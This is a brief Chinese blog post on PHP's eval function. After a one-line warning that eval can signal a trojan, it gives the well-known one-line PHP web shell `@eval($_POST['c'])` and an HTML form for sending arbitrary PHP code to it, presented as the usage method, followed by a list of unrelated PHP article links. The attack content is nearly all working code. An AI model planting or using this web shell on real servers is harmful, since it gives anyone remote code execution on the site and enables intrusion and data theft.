php eval函数一句话木马代码
2015-05-21 11:03
591 查看
eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马
就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范
<?php @eval($_POST['c']);?>
使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
以上所述就是本文的全部内容了,希望大家能够喜欢。
您可能感兴趣的文章:
相关文章推荐
- Apache 2.0.55 + PHP 5.1.0 + MySQL 4.1.15 菜鸟式安装
- 构建PHP扩展时可以参考的一些资料
- 用PHP和MySQL保存和输出图片
- 修改php.ini以达到 屏蔽错误信息
- php图片上传
- PHP session_start()问题解疑
- 研究PHP处理Mysql字段属性为UNSIGNED ZEROFILL的数据
- PHP和Javascript的JSON交互(处理一个二维数组)(转)
- php入门资料
- PHP 和 Servlet 通过Socket通信
- PHP乱码问题,UTF-8(乱码)
- php获取网页内容方法
- PHP开发提高效率技巧
- PHP实现http与https转化
- PHP学习笔记【15】--全局变量,静态变量,静态方法,php方法重载
- PHP与MySQL数据库操作函数详解
- 06-php面向对象编程,静态方法
- php 文件上传类
- php使浏览器直接下载pdf文件的方法
- PHP 中cookie 和session 的分析